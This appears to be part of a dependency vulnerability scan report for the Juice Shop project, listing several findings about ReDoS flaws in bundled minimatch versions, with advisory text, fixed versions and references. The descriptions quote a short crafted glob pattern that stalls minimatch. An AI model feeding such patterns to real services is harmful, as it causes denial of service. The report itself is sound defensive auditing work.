+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 156: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/fstream/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 157: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 158: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 159: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/rimraf/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 160: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 161: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 162: CVE-2026-26996 Minimatch 5.1.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch5.1.6
+ + + + + + + +
File Path
juice-shop/node_modules/filehound/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 163: CVE-2026-27903 Minimatch 5.1.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch5.1.6
+ + + + + + + +
File Path
juice-shop/node_modules/filehound/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 164: CVE-2026-27904 Minimatch 5.1.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch5.1.6
+ + + + + + + +
File Path
juice-shop/node_modules/filehound/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 165: CVE-2026-26996 Minimatch 9.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch9.0.5
+ + + + + + + +
File Path
